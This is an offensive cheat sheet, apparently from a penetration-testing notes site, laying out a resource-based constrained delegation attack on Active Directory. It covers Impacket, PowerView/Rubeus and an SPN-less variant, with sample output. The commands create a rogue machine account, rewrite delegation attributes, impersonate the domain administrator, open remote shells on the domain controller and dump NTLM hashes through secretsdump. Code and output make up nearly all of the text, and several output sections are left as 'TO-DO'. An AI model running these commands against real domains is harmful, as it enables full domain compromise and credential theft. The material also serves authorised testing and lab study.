Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
RBCD Attack
1. Create a Fake Computer [Optional]
# Check machine account quota
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -M maq
Sample Output:
$ nxc ldap example.com -u 'test.user' -p 'Test1234' -M maq
SMB 10.10.11.10 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:example.com) (signing:True) (SMBv1:False)
LDAP 10.10.11.10 389 DC [+] example.com\test.user:Test1234
MAQ 10.10.11.10 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.11.10 389 DC MachineAccountQuota: 10
# Add a fake computer
impacket-addcomputer -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>' -dc-ip <DC_IP> '<DOMAIN>/<USER>:<PASSWORD>'
Sample Output:
$ impacket-addcomputer -computer-name 'EvilComputer' -computer-pass 'Test1234' -dc-ip 10.10.11.10 'example.com/test.user:Test1234'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Test1234.
2. Get Service Principle Name (SPN) [Optional]
# Password
impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web:Password' -dc-ip 10.10.132.53 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com svc_web 2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# Kerberos
sudo ntpdate -s <DC_IP> && impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -request -k
Sample Output:
TO-DO# If NTLM auth is disabled
sudo ntpdate -s <DC_IP> && impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-host <DC> -request -k
Sample Output:
TO-DO3. RBCD Attack [Control over an Account with SPN]
impacket-rbcd -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -dc-ip <DC_IP> -action 'write' '<DOMAIN>/<USER>:<PASSWORD>'
Sample Output:
$ impacket-rbcd -delegate-to 'DC$' -delegate-from 'EvilComputer$' -dc-ip 10.10.11.10 -action 'write' 'example.com/test.user:Test1234'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
Note: Delegate from an account with SPN, which may not be a computer.
Note: Remove trailing $ if not a machine account.
4. Impersonate
# Password
sudo ntpdate -s <DC_IP> && impacket-getST -spn cifs/<TARGET_DOMAIN> -impersonate <TARGET_USER> -dc-ip <DC_IP> '<DOMAIN>/<COMPUTER>:<COMPUTER_PASSWORD>'
Sample Output:
$ sudo ntpdate -s dc.example.com && impacket-getST -spn cifs/dc.example.com -impersonate administrator -dc-ip 10.10.11.10 'example.com/EvilComputer:Test1234'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getST -spn cifs/<TARGET_DOMAIN> -impersonate <TARGET_USER> -dc-ip <DC_IP> '<DOMAIN>/<COMPUTER>' -hashes ':<HASH>'
Sample Output:
TO-DO5. Import Ticket
export KRB5CCNAME='<CCACHE_FILE>'
Sample Output:
$ export KRB5CCNAME='administrator@cifs_dc.example.com@EXAMPLE.COM.ccache'
6. Post-Attack
# Remote
sudo ntpdate -s <DC_IP> && impacket-psexec <DOMAIN>/<TARGET_USER>@<TARGET_DOMAIN> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc.example.com && wmiexec.py example.com/administrator@dc.example.com -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
# Or secretsdump
impacket-secretsdump <TARGET_USER>@<TARGET_DOMAIN> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
1. Import Modules
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> . .\PowerView.ps1
. .\Powermad.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> . .\Powermad.ps1
Ref: Powermad.ps1
2. Check Machine Account Quota
Get-DomainObject -Identity 'DC=<EXAMPLE>,DC=<COM>' | select ms-ds-machineaccountquota
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-DomainObject -Identity 'DC=EXAMPLE,DC=COM' | select ms-ds-machineaccountquota
ms-ds-machineaccountquota
-------------------------
10
3. Create New Computer Account
New-MachineAccount -MachineAccount EvilComputer -Password $(ConvertTo-SecureString '<COMPUTER_PASSWORD>' -AsPlainText -Force)
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> New-MachineAccount -MachineAccount EvilComputer -Password
$(ConvertTo-SecureString 'Test1234' -AsPlainText -Force)
[+] Machine account EvilComputer added
4. RBCD Attack
$fakesid = Get-DomainComputer EvilComputer | select -expand objectsid
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $fakesid = Get-DomainComputer EvilComputer | select -expand objectsid
$fakesid
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $fakesid
S-1-5-21-3542429192-2036945976-3483670807-11601
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <TARGET_COMPUTER> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
5. Check if SecurityIdentifier is Now fakesid
$RawBytes = Get-DomainComputer <TARGET_COMPUTER> -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $Descriptor.DiscretionaryAcl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-3542429192-2036945976-3483670807-11601
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
6. Impersonate
.\rubeus.exe hash /password:'<COMPUTER_PASSWORD>' /user:EvilComputer /domain:<DOMAIN>
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> .\rubeus.exe hash /password:'Test1234' /user:EvilComputer /domain:example.com
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Test1234
[*] Input username : EvilComputer
[*] Input domain : example.com
[*] Salt : EXAMPLE.COMEvilComputer
[*] rc4_hmac : B9E0CFCEAF6D077970306A2FD88A7C0A
[*] aes128_cts_hmac_sha1 : FE834E7490537D833B4FBB0C215BEDB3
[*] aes256_cts_hmac_sha1 : D105000C879775D1727D9E56EF0CA48FD2996B9370165832BB1C5A265922B359
[*] des_cbc_md5 : DAE66B133454FDB5
.\rubeus.exe s4u /user:'EvilComputer$' /rc4:<HASH> /impersonateuser:administrator /msdsspn:cifs/<TARGET_DOMAIN> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> .\rubeus.exe s4u /user:'EvilComputer$' /rc4:B9E0CFCEAF6D077970306A2FD88A7C0A /impersonateuser:administrator /msdsspn:cifs/dc.example.com /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: B9E0CFCEAF6D077970306A2FD88A7C0A
[*] Building AS-REQ (w/ preauth) for: 'example.com\EvilComputer$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFuDCCBb ---[SNIP]--- VyLmh0Yg==
[*] Action: S4U
[*] Building S4U2self request for: 'EvilComputer$@EXAMPLE.COM'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'EvilComputer$@EXAMPLE.COM'
[*] base64(ticket.kirbi):
doIGCjCCBg ---[SNIP]--- 1wdXRlciQ=
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.example.com'
[*] Building S4U2proxy request for service: 'cifs/dc.example.com'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.example.com':
doIGujCCBr ---[SNIP]--- VyLmh0Yg==
[+] Ticket successfully imported!
7. Convert to ccache Format
python3 rubeustoccache.py '<BASE64_TICKET>' secrets.kirbi secrets.ccache
Sample Output:
$ python3 rubeustoccache.py 'doIGujCCBr ---[SNIP]--- VyLmh0Yg==' secrets.kirbi secrets.ccache
╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐ ┌┬┐┌─┐ ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐ │ │ │ ║ │ ├─┤│ ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘ ┴ └─┘ ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
By Solomon Sklash
github.com/SolomonSklash
Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to secrets.kirbi
[*] Writing converted .ccache file to secrets.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=secrets.ccache
export KRB5CCNAME=secrets.ccache
Sample Output:
$ export KRB5CCNAME=secrets.ccache
Ref: RubeusToCcache
8. Post-Attack
# Remote
sudo ntpdate -s <DC_IP> && impacket-psexec <DOMAIN>/administrator@<TARGET_DOMAIN> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc.example.com && impacket-psexec example.com/administrator@dc.example.com -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Requesting shares on dc.example.com.....
[*] Found writable share ADMIN$
[*] Uploading file sxEWFPos.exe
[*] Opening SVCManager on dc.example.com.....
[*] Creating service OtwL on dc.example.com.....
[*] Starting service OtwL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
# Or secretsdump
impacket-secretsdump administrator@<TARGET_DOMAIN> -k -no-pass -just-dc-user Administrator
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
SPN-Less RBCD Attack
1. RBCD
impacket-rbcd -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>' -dc-ip <DC_IP> -action 'write' '<DOMAIN>/<USER>:<PASSWORD>'
Sample Output:
$ impacket-rbcd -delegate-from 'aseed' -delegate-to 'DC$' -dc-ip 10.10.86.220 -action 'write' 'example.com/aseed:gB6XTcqVP5MlP7Rc'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] aseed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] aseed (S-1-5-21-4029599044-1972224926-2225194048-1126)
2. Generate NTLM
iconv -f ASCII -t UTF-16LE <(printf '<PASSWORD>') | openssl dgst -md4
Sample Output:
$ iconv -f ASCII -t UTF-16LE <(printf 'gB6XTcqVP5MlP7Rc') | openssl dgst -md4
MD4(stdin)= 8ecffccc2f22c1607b8e104296ffbf68
3. Request a TGT
impacket-getTGT '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -hashes ':<HASH>'
Sample Output:
$ impacket-getTGT 'example.com/aseed@DC.example.com' -hashes ':8ecffccc2f22c1607b8e104296ffbf68'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in aseed@DC.example.com.ccache
4. Get Session Key
# Import ticket
export KRB5CCNAME='<CCACHE_FILE>'
Sample Output:
$ export KRB5CCNAME='aseed@DC.example.com.ccache'
# Get tickey session key
impacket-describeTicket '<CCACHE_FILE>' | grep 'Ticket Session Key'
Sample Output:
$ impacket-describeTicket aseed@DC.example.com.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key : 49e0cd8abe883d869f5af9ad8556fb29
5. Update Target User NT Hash
impacket-changepasswd '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>' -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd -newhashes :49e0cd8abe883d869f5af9ad8556fb29 'example.com/aseed:gB6XTcqVP5MlP7Rc@DC.example.com'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\aseed
[*] Connecting to DCE/RPC as example.com\aseed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
6. Get a Service Ticket
impacket-getST '<DOMAIN>/<USER>' -k -no-pass -u2u -impersonate 'Administrator' -spn 'cifs/<TARGET_DOMAIN>'
Sample Output:
$ impacket-getST 'example.com/aseed' -k -no-pass -u2u -impersonate 'Administrator' -spn 'cifs/DC.example.com'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@PHANTOM.VL.ccache
7. Secrets Dump
# Import ticket
export KRB5CCNAME='<CCACHE_FILE_2>'
Sample Output:
$ export KRB5CCNAME='Administrator@cifs_DC.example.com@PHANTOM.VL.ccache'
# Secrets dump
impacket-secretsdump -k -no-pass <TARGET_DOMAIN>
Sample Output:
TO-DO